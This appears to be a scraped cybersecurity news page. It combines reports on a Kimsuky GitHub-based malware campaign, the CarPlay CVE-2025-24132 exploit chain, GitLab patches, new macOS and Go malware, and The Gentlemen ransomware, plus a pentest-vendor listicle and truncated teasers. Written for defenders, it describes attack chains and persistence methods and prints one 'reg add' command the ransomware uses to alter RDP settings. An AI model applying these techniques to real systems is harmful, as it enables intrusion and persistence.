The North Korea-backed APT group Kimsuky has escalated its cyber operations by weaponizing GitHub repositories for malware delivery and data exfiltration, marking a sophisticated evolution in their attack methodology.
This latest campaign demonstrates the group’s growing expertise in abusing legitimate cloud infrastructure to evade traditional security measures while maintaining persistent access to compromised systems.
The attack chain begins with a malicious ZIP archive containing an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk).
When executed, this weaponized shortcut launches a PowerShell command that downloads and executes additional malicious scripts from attacker-controlled GitHub repositories.
The initial payload establishes a foundation for systematic data collection and maintains long-term persistence on infected systems.
S2W researchers identified nine private GitHub repositories associated with this campaign, including group_0717, group_0721, test, hometax, and group_0803.
The threat actors embedded hardcoded GitHub Private Tokens directly within their PowerShell scripts to access these repositories, demonstrating careful operational security planning.
Analysis of commit histories revealed the attacker’s email address (sahiwalsuzuki4[@]gmail.com) used during GitHub account creation.
The malware’s persistence mechanism represents a particularly sophisticated approach to maintaining long-term access.
Upon initial infection, the main.ps1 script creates a file named MicrosoftEdgeUpdate.ps1 under the %AppData% directory and establishes a scheduled task with the name “BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}”.
This task executes every 30 minutes after an initial 5-minute delay, creating an automated system for fetching and executing updated PowerShell scripts from the GitHub repository.
Dynamic Script Management and Information Gathering
The malware employs a dynamic script management system that timestamps infected systems and creates customized folders for data exfiltration.
The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings with timestamped values (ntxBill_{MMdd_HHmm}), and re-uploads the modified script using a time-specific filename format.
This mechanism allows attackers to track individual infections and manage multiple compromised systems simultaneously.
The information-stealing component collects comprehensive system metadata including IP addresses, boot times, operating system details, hardware specifications, device types, installation dates, and running processes.
All collected data is compiled into log files and uploaded to the attacker’s repository under timestamped folders, creating an organized intelligence database for the threat actors.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
At the recent DefCon security conference, researchers demonstrated a critical exploit chain that allows attackers to gain root access on vehicle infotainment systems by targeting Apple CarPlay.
The multi-stage attack, named “Pwn My Ride,” leverages a series of vulnerabilities in the protocols that underpin wireless CarPlay, culminating in remote code execution on the car’s multimedia unit.
The core of the exploit is CVE-2025-24132, a stack buffer overflow vulnerability within the AirPlay protocol SDK. Researchers from Oligo Security presented how this flaw can be triggered once an attacker gains access to the vehicle’s Wi-Fi network.
The vulnerability affects a wide range of devices that use AirPlay audio SDK versions before 2.7.1, AirPlay video SDK versions before 3.6.0.126, and specific versions of the CarPlay Communication Plug-in.
By exploiting this buffer overflow, an attacker can execute arbitrary code with the highest level of system privileges, effectively taking control of the infotainment system.
Exploiting the iAP2 Protocol
The attack begins by targeting the initial connection process of wireless CarPlay. This process relies on two key protocols: iAP2 (iPod Accessory Protocol) over Bluetooth and AirPlay over Wi-Fi.
The researchers discovered a fundamental authentication flaw within the iAP2 protocol. While the protocol ensures the car authenticates the phone, it fails to perform the reverse; the phone does not authenticate the car.
This one-way authentication allows an attacker’s device to impersonate a legitimate iPhone.
The attacker can then pair with the vehicle’s Bluetooth, often without a PIN code due to many systems defaulting to the insecure “Just Works” pairing mode.
Once paired, the attacker exploits the iAP2 flaw to send a RequestAccessoryWiFiConfigurationInformation command, which tricks the system into revealing the vehicle’s Wi-Fi SSID and password.
After obtaining the Wi-Fi credentials, the attacker connects to the car’s network and triggers CVE-2025-24132 to gain root access.
This entire sequence can be a zero-click attack on many vehicles, requiring no interaction from the driver.
Although Apple issued a patch for the vulnerable AirPlay SDK in April 2025, researchers noted that, to their knowledge, no car manufacturer has applied the fix, Oligo Security said.
Unlike smartphones, which receive frequent over-the-air (OTA) updates, vehicle software update cycles are notoriously slow and fragmented.
Many cars require a manual update at a dealership, and each automaker must independently test and validate the patched SDK for their specific hardware.
This significant delay leaves millions of vehicles exposed to this vulnerability long after a fix has been made available, highlighting a critical gap in the automotive supply chain’s security posture.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
GitLab has released critical security updates across multiple versions to address six significant vulnerabilities that could enable denial-of-service attacks, server-side request forgery, and information disclosure. The company released versions 18.3.2, 18.2.6, and 18.1.6 for both Community Edition and Enterprise Edition, with immediate upgrades strongly recommended for all self-managed installations. Critical Security Fixes Target Multiple Attack […]
Cybersecurity researchers have discovered two new malware families, including a modular Apple macOS backdoor called CHILLYHELL and a Go-based remote access trojan (RAT) named ZynorRAT that can target both Windows and Linux systems.
According to an analysis from Jamf Threat Labs, ChillyHell is written in C++ and is developed for Intel architectures.
CHILLYHELL is the name assigned to a malware
In recent months, security researchers have observed a surge in activity by a previously undocumented ransomware group known as The Gentlemen.
This threat actor has rapidly distinguished itself through the deployment of highly specialized tools and meticulous reconnaissance tactics, targeting critical infrastructure across multiple sectors and regions.
Leveraging legitimate Windows drivers and nuanced Group Policy Object (GPO) manipulation, The Gentlemen are capable of evading traditional defenses and achieving domain-wide compromise.
The initial intrusion techniques of this group remain partially obscured; however, forensic evidence suggests that compromised credentials or exposed internet-facing services served as the primary infection vectors.
Following foothold establishment, The Gentlemen deploy a dual-component defense evasion suite consisting of All.exe and ThrottleBlood.sys—a legitimate signed driver abused to terminate protected security processes.
The Gentlemen ransomware group blog site (Source – Trend Micro)
This kernel-level manipulation enables the threat actors to neutralize endpoint protections without triggering standard alerts.
Trend Micro analysts noted that subsequent iterations of this suite include a dynamically modified binary, Allpatch2.exe, which specifically targets the unique security agent components present in the compromised network.
By adapting their tools mid-campaign, the group has demonstrated both flexibility and a deep understanding of the enterprise security landscape.
This approach has facilitated widespread deployment of their encryption payload via the NETLOGON share, ensuring rapid and comprehensive file encryption across domain-joined systems.
The impact of The Gentlemen’s operations has been severe: key sectors such as manufacturing, healthcare, and construction have suffered service disruptions and extensive data encryption.
Victims have reported loss of critical backups and unauthorized exfiltration of sensitive information via WinSCP, confirming the adoption of a double-extortion strategy.
Victim distribution by industry, region, and country (as of August 2025) (Source – Trend Micro)
This depicts the ransomware attack chain, illustrating each stage from initial access through data exfiltration.
Infection Mechanism and Kernel-Level Evasion
A defining characteristic of The Gentlemen’s methodology is its exploitation of a legitimate Windows driver to achieve kernel-level execution.
Upon execution, the ransomware drops a pair of files into the %USERPROFILE%\Downloads directory:-
The attacker then invokes the driver to terminate targeted security services: the command-line sequence illustrates this abuse of signed driver functionality:-
By leveraging this technique, The Gentlemen escape the limitations of user-mode bypasses.
Once kernel execution is secured, the ransomware escalates privileges using PowerRun.exe, a legitimate utility frequently abused for elevated command execution.
This allows the malware to modify critical registry keys—such as enabling RDP access via reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v SecurityLayer /t REG_DWORD /d 1 /f—and deploy persistence mechanisms through GPO objects.
The Gentlemen ransomware attack chain (Source – Trend Micro)
While this attack chain shows the code-driven stages of driver-based process termination. The combination of legitimate tools with custom binaries exemplifies a mature adversary who balances stealth, adaptability, and impact.
As organizations struggle with conventional endpoint defenses, the emergence of such advanced tactics underscores the urgent need for proactive threat hunting and implementation of Zero Trust principles.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Fileless malware has become a formidable adversary for security teams, operating entirely in memory and evading disk-based detection. A recent incident demonstrates how attackers leveraged a multi-stage fileless loader to deploy AsyncRAT, a powerful Remote Access Trojan (RAT), through legitimate system tools—leaving almost no footprint on disk. This case study highlights critical techniques for persistence, […]
GitLab has released urgent security patches for its Community (CE) and Enterprise (EE) editions, addressing multiple vulnerabilities, including two high-severity flaws that could lead to Server-Side Request Forgery (SSRF) and Denial of Service (DoS) attacks.
The company is strongly advising all administrators of self-managed GitLab installations to upgrade immediately to the newly released versions: 18.3.2, 18.2.6, and 18.1.6.
The updates address a total of six security vulnerabilities, ranging in severity. Customers using the cloud-hosted GitLab.com service are already protected, and GitLab Dedicated users do not need to take any action.
The fixes are part of GitLab’s scheduled patch releases, which aim to resolve security issues and bugs promptly.
High-Severity Flaws Patched
The most critical vulnerabilities fixed in this release are a high-severity SSRF flaw and a high-severity DoS issue.
The SSRF vulnerability, tracked as CVE-2025-6454, holds a CVSS score of 8.5. It existed in the Webhook custom header feature and could be exploited by an authenticated user.
By injecting specially crafted sequences, an attacker could force the GitLab instance to make unintended internal requests within proxy environments, potentially leading to further compromise.
This flaw affects all versions from 16.11 up to the latest patched releases. The second high-severity issue, CVE-2025-2256, is a DoS vulnerability with a CVSS score of 7.5.
An unauthenticated attacker could have exploited this flaw by sending multiple, concurrent significant SAML responses to a GitLab instance, overwhelming its resources and rendering it unresponsive to legitimate users.
This vulnerability has a wide impact, affecting all versions from 7.12.
Medium-Severity Vulnerabilities Addressed
Alongside the high-severity issues, GitLab patched four medium-severity vulnerabilities, three of which could also result in a denial of service.
CVE-2025-1250: A DoS flaw (CVSS 6.5) where an authenticated user could stall background job processing by using specially crafted commit messages or merge request descriptions.
CVE-2025-7337: A persistent DoS vulnerability (CVSS 6.5) that allowed an authenticated user with at least Developer-level access to crash a GitLab instance by uploading large files.
CVE-2025-10094: Another DoS issue (CVSS 6.5) enabling authenticated users to disrupt access to token-related operations by creating tokens with excessively long names.
CVE-2025-6769: An information disclosure vulnerability (CVSS 4.3) that could have allowed an authenticated user to view administrator-only maintenance notes by accessing runner details through specific interfaces.
GitLab has credited several security researchers, yuki_osaki, ppee, pwnie, and iamgk808, for discovering and reporting these vulnerabilities through its HackerOne bug bounty program.
In line with its disclosure policy, the full details of these vulnerabilities will be made public on GitLab’s issue tracker 30 days after the release.
The company has urged all self-managed customers to review the security announcement and apply the updates to protect their instances from potential attacks.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A high-quality mobile application penetration testing company is essential for businesses that want to safeguard their digital assets and user data.
These specialized firms employ ethical hackers who simulate real-world cyberattacks to identify and exploit vulnerabilities within mobile apps.
The insights from these tests enable developers to fix security flaws before they can be leveraged by malicious actors, thereby preventing data breaches, reputational damage, and financial loss.
Choosing a top mobile app pentesting company requires a careful evaluation of their expertise, methodology, and reputation.
The best firms don’t just use automated tools; they combine them with deep, manual analysis to uncover complex, business-logic vulnerabilities that scanners often miss.
Their reports are not only comprehensive but also provide clear, actionable remediation steps, empowering development teams to build more secure applications.
With the mobile threat landscape constantly evolving, partnering with a leading mobile application penetration testing firm is a proactive and strategic investment for any business committed to security.
How We Chose These Best Mobile Application Penetration Testing Companies
To identify the best mobile application penetration testing companies, we focused on several key criteria that align with Google’s E-A-T (Expertise, Authoritativeness, Trustworthiness) guidelines and critical SEO signals. Our selection process was guided by the following factors:
Expertise and Methodology: We looked for companies with a proven track record of deep, specialized knowledge in mobile security. This includes expertise in both iOS and Android platforms, as well as a robust methodology that combines automated scanning with thorough manual testing and reverse engineering.
Customer Reviews and Reputation: We evaluated customer feedback and industry recognition from platforms like Gartner Peer Insights and other reputable sources. Companies with high customer satisfaction and positive peer reviews were prioritized.
Comprehensive Service Offerings: The top firms don’t just offer penetration testing; they provide a full suite of services, including static and dynamic analysis, API security testing, and compliance reporting (e.g., OWASP Mobile Top 10, GDPR).
Actionable Reporting: A key differentiator is the quality of the final report. We selected companies that provide clear, detailed, and actionable reports with risk prioritization and specific remediation guidance for developers.
Integration and Scalability: We considered firms that offer flexible solutions that can integrate seamlessly into a company’s existing DevSecOps pipeline, allowing for continuous security testing.
Comparison Table: Top 10 Best Mobile Application Penetration Testing companies in 2025
Company
Automated Scanning
Manual Pentesting
Cloud-Based Service
DevSecOps Integration
Compliance Reporting
Veracode
Yes
Yes
Yes
Yes
Yes
White Knight Labs
No
Yes
Yes
Yes
Yes
Appknox
Yes
Yes
Yes
Yes
Yes
Pradeo
Yes
No
Yes
No
Yes
Cyserch
Yes
Yes
No
No
Yes
Software Secured
No
Yes
No
Yes
No
NowSecure
Yes
Yes
Yes
Yes
Yes
Microminder CS
Yes
Yes
Yes
Yes
Yes
Checkmarx
Yes
No
Yes
Yes
Yes
Acunetix
Yes
No
Yes
Yes
Yes
1. Veracode
Veracode
Specifications:
Veracode offers a full-lifecycle application security platform that includes penetration testing as a service (PTaaS).
It combines expert-led manual testing with automated SAST, DAST, and SCA to find a wide range of vulnerabilities, including business logic flaws and nuanced issues that automated tools may miss.
Their approach is designed to be hassle-free and can be scheduled to meet recurring compliance needs.
Reason to Buy:
Best for enterprises seeking a complete, integrated application security platform that blends expert manual testing with powerful automation.
Features:
Penetration Testing as a Service; Centralized platform for all security testing; PCI-DSS, HIPAA, GDPR compliance support; AI-powered remediation guidance; Flexible, predictable pricing models;
Can be expensive for smaller teams; Steep learning curve for full platform usage; Some users report complex integrations; Not a pure-play pentesting firm;
Best For: Large enterprises and organizations that require a holistic, ongoing AppSec program with robust compliance and reporting capabilities.
White Knight Labs provides premier mobile application penetration testing with a focus on both iOS and Android platforms.
Their methodology is comprehensive, simulating multiple attack vectors including insecure storage, stolen device scenarios, and API exploitation.
The team has extensive experience in reverse engineering and tailors assessments to address platform-specific security risks.
Reason to Buy:
Ideal for organizations that need a highly specialized, hands-on, and expert-led manual penetration test for their mobile applications.
Features:
iOS and Android-specific expertise; Comprehensive methodology; Source code review and reverse engineering; In-depth API security testing; Detailed reports with remediation guidance;
Pros:
Highly experienced team; Tailored, manual approach; Deep technical analysis; Excellent reporting and consultation;
Cons:
Primarily focused on manual testing; May not be suitable for teams needing automated CI/CD integration; Less emphasis on automated scanning; Pricing can vary based on project scope;
Best For: Companies that need an in-depth, hands-on security assessment from a highly specialized team of experts.
Appknox is a mobile-first security platform that delivers a suite of solutions including automated and manual vulnerability assessments.
Recognized by Gartner for its focus on 2025 AppSec trends, it’s designed to be CI/CD-ready and AI-powered, making it easy for developers to integrate security into their workflow.
The platform is especially strong in compliance, helping businesses meet standards like OWASP Mobile Top 10 and GDPR.
Reason to Buy:
A user-friendly, developer-centric platform that simplifies mobile application security testing and compliance for teams of all sizes.
Features:
AI-powered and CI/CD ready; Manual vulnerability assessment; Streamlined compliance management; Detailed, user-friendly reports; Integrates with Jira and other dev tools;
Pros:
Easy to use and set up; Mobile-first focus; Strong compliance features; AI-augmented remediation;
Cons:
Less known for general web application security; Manual testing is an add-on; May have a smaller team of manual testers; Focus is more on platform than pure service;
Best For: Development teams and startups that need a fast, user-friendly, and compliance-focused mobile security platform.
Pradeo is a mobile security company that leverages AI-based technology to deliver robust mobile application security testing (MAST).
Their primary focus is on automated, deep analysis of mobile apps to detect vulnerabilities and data leakage, providing a 360-degree view of an application’s security posture.
Their solution is particularly effective at scanning binary files, making it a valuable tool for examining off-the-shelf applications.
Reason to Buy:
An AI-driven solution that offers rapid and comprehensive automated analysis of mobile apps, even without access to source code.
Features:
AI-based security testing; Fast analysis of binary files; Data leakage prevention; Mobile Threat Defense (MTD); Integration with enterprise mobility management (EMM);
Pros:
Highly automated and fast; Excellent for third-party app analysis; Focus on mobile-specific threats; Clear, comprehensive reporting;
Cons:
Lacks a manual penetration testing service; May not uncover complex business logic flaws; Primarily a tool-based approach; Less suitable for deeply custom tests;
Best For: Businesses that need a powerful, automated solution for quick, continuous security assessments of both internally developed and third-party apps.
Cyserch is a cybersecurity firm offering comprehensive mobile application penetration testing services. They utilize a blend of OWASP methodology and a hybrid approach to create tailored test cases for each application’s unique business logic.
Their process includes static and dynamic analysis, reverse engineering, and in-depth testing of data storage and authentication mechanisms, delivering detailed and actionable reports.
Reason to Buy:
A trusted partner for customized, end-to-end security evaluations with a strong emphasis on detailed, developer-friendly reporting.
Features:
OWASP methodology; Hybrid testing approach; Static and dynamic analysis; In-depth data storage testing; Comprehensive vulnerability reports;
Pros: Tailored testing methodology; Focus on business logic; High-quality, detailed reports; Cost-effective solutions;
Cons: Less integrated into modern CI/CD pipelines; May not offer the same scale as larger firms; Lacks some of the automated features of platform-based competitors; Primarily a service provider;
Best For: Companies that require a bespoke, detailed security assessment and a clear, developer-friendly report from a dedicated team.
Software Secured specializes in human-led security services, providing an Application Penetration Testing as a Service (PTaaS) model.
Their methodology emphasizes manual testing and a consultative approach to find business logic vulnerabilities.
They integrate with client teams to provide expert guidance and ensure that remediation efforts are effective. While they have a platform, their core strength lies in their expert-driven service model.
Reason to Buy:
For organizations that prioritize a consultative, human-led approach over a purely automated solution, focusing on business logic and custom-built applications.
Features:
Human-led security testing; PTaaS model; Expert-driven services; Seamless team integration; Proactive and continuous security;
Pros: Deep expertise in manual testing; Highly consultative approach; Uncovers complex business logic flaws; Strong focus on remediation;
Cons: Not a fully automated solution; Not ideal for teams needing high-volume, continuous scanning; No automated reports and compliance checks; Services are project-based;
Best For: Businesses with complex, custom-built applications that require a hands-on, expert-led security partner.
NowSecure offers a comprehensive mobile app security platform that combines automated and manual testing. Their platform provides continuous security testing within the SDLC, with capabilities for static, dynamic, interactive, and API analysis.
They are particularly well-regarded for their ability to integrate with CI/CD pipelines and their commitment to standards-based testing, such as OWASP MASVS. NowSecure also provides expert-led penetration testing as a service.
Reason to Buy:
The most comprehensive and scalable solution for integrating continuous, standards-based mobile application security testing into a DevSecOps pipeline.
Features:
DevSecOps integration; Automated and manual testing; OWASP MASVS compliance; Mobile App Risk Intelligence (MARI); Expert-led penetration testing services;
Pros:
Excellent for continuous testing; Highly scalable platform; Strong compliance focus; Combines automation with human expertise;
Cons:
Platform can be complex to navigate; Can be expensive for smaller teams; Requires a good understanding of the platform to maximize its value;
Best For: Large enterprises and organizations committed to a mature DevSecOps model, needing a scalable and integrated mobile security solution.
Microminder CS is a CREST-certified infosec consultancy that offers comprehensive mobile application testing services. Their methodology involves a four-stage process: intelligence gathering, app analysis, exploitation, and reporting.
They simulate real-world attacks to find vulnerabilities in data transmission, storage, authentication, and session management, providing both executive and technical reports with actionable remediation advice.
Reason to Buy:
A trustworthy, CREST-certified consultancy that provides a holistic and professional approach to mobile application penetration testing with a strong focus on remediation.
Features:
CREST-certified experts; Four-stage methodology; Real-world attack simulation; Executive and technical reports; Global presence and service;
Pros:
High level of expertise and certification; Holistic and professional approach; Delivers clear, actionable reports; Strong reputation for quality;
Cons:
Service-based model, less focused on automation; May be more expensive than platform-based tools; Not ideal for continuous testing needs; Primarily a service provider, not a tool vendor;
Best For: Organizations that need a full-service, expert-led engagement from a highly certified and globally respected security firm.
Checkmarx provides a comprehensive application security testing platform with a strong focus on static analysis (SAST).
While its core is source code analysis, it offers solutions that help identify and fix vulnerabilities in mobile applications by integrating security into the development workflow.
The platform also provides DAST, IAST, and SCA capabilities to offer a more complete view of application risk.
Reason to Buy:
For organizations that want to “shift left” and embed security testing directly into the development pipeline, using a platform with a global reputation.
Features:
SAST, DAST, and SCA; Source code analysis; DevSecOps integration; Detailed reports with remediation advice; Aligned with OWASP Top 10;
Pros:
Strong reputation and industry presence; Deep source code analysis capabilities; Integrates with many dev tools; Helps with compliance;
Cons:
Can be slow on large codebases; High number of false positives can be an issue; Not a specialized mobile pentesting service; Pricing can be complex;
Best For: Large-scale software development teams that need to integrate robust, automated security scanning early in the development lifecycle.
Acunetix is a widely-used web vulnerability scanner that also offers a robust solution for securing mobile applications that rely on web APIs and back-end services.
While it’s a DAST-focused tool, its ability to crawl and scan complex web applications, single-page apps, and password-protected pages makes it a valuable asset in the mobile security toolkit.
Acunetix helps organizations comply with standards like PCI-DSS and HIPAA by generating detailed compliance reports.
Reason to Buy:
A powerful, automated DAST solution that is easy to set up and provides high-accuracy vulnerability detection for web services that power mobile apps.
Features:
High-accuracy DAST scanning; Integrates with CI/CD tools; Supports many compliance standards; Detailed, actionable reports; API vulnerability testing;
Pros:
High detection rate and low false positives; Easy to use and set up; Good for API-driven mobile apps; Robust reporting features;
Cons:
Not a pure mobile application security tool; Lacks manual, human-led pentesting; Primarily focuses on the web components of an app; Less suited for on-device vulnerabilities;
Best For: Teams primarily concerned with securing the web APIs and back-end infrastructure that their mobile applications rely on.
Choosing the best mobile application penetration testing company is a critical decision for any organization today. The right partner can not only identify hidden vulnerabilities but also help you build a more secure development process.
The companies listed here represent a diverse range of services, from highly specialized manual testing to comprehensive, automated platforms.
By evaluating your specific needs—whether it’s a deep, one-time audit or a continuous security program—you can select the provider that offers the most effective solution for protecting your mobile applications and your users.
Content creators and small businesses are facing a sophisticated new threat targeting their Facebook accounts through deceptive advertisements promising free Meta verification badges. A new malvertising campaign is targeting Facebook users with malicious ads that promise to unlock Meta’s coveted blue verification tick through a seemingly legitimate browser extension. These ads, accompanied by instructional videos, […]
A newly disclosed vulnerability in Apple’s CarPlay ecosystem enables remote code execution with root privileges, posing a serious risk to connected vehicles. Discovered by the Oligo Security Research team and tracked as CVE-2025-24132, the flaw resides within the AirPlay protocol implementation used by CarPlay systems. CVE ID Affected Components Versions Impacted CVE-2025-24132 AirPlay Audio SDK < 2.7.1 […]
.webp)
%20(Source%20-%20Trend%20Micro).webp)
.webp)
Yes
No
